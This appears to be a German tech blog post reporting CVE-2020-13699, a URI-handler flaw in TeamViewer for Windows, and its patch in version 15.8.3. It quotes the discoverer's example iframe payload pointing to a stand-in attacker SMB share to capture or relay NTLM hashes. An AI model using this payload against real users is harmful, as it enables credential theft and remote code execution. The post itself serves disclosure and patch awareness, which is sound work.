[English]In älteren Versionen der Remote-Zugriffs-Software TeamViewer gab es eine Schwachstelle. Diese ermöglichte es Dritten unbemerkt eine Verbindung zum jeweiligen PC aufzubauen. Die Schwachstelle wurde durch einen Patch beseitigt.
Anzeige
Die Schwachstelle CVE-2020-13699
Die Schwachstelle CVE-2020-13699 betraf den TeamViewer Desktop für Windowsbis zur Version 15.8.2. Die Software zitiert seine benutzerdefinierten URI-Handler nicht korrekt. Eine bösartige Website konnte den TeamViewer mit beliebigen Parametern starten, wie:
teamviewer10: –play URL
Die ermöglichtes es einem Angreifer ein Opfer zu zwingen, eine NTLM-Authentifizierungsanforderung zu senden und entweder die Anforderung weiterzuleiten oder den Hash zum Offline-Kennwort-Knacken zu erfassen. Der Entdecker der Schwachstelle beschreibt diese hier folgendermaßen.
An attacker could embed a malicious iframe in a website with a crafted URL:
<iframe src="teamviewer10: –play \\attacker-IP\share\fake.tvs">
that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).
Das könnte bei Watering Hole-Angriffen benutzt werden, um unbemerkt eine Verbindung aufzunehmen, wie man hier nachlesen kann. Dabei ist nicht einmal ein Passwort erforderlich. Allerdings gibt es bisher keine Anzeichen, dass die Schwachstelle ausgenutzt wird.
Anzeige
Update auf TeamViewer Version 15.8.3
Bei Bleeping Computer habe ich hier mitbekommen, dass es ein Update des TeamViewer auf die Version 15.8.3 gab, das die Schwachstelle schließt. Allerdings hat der Anbieter vor ca. 2 Wochen das Update in diesem Community-Beitrag angekündigt.
Statement on CVE 2020-13699
Today we are releasing some updates for TeamViewer 8 through 15, for the Windows platform.
We implemented some improvements in URI handling relating to CVE 2020-13699.
Die Änderungen sind im Changelog nachlesbar.
Anzeige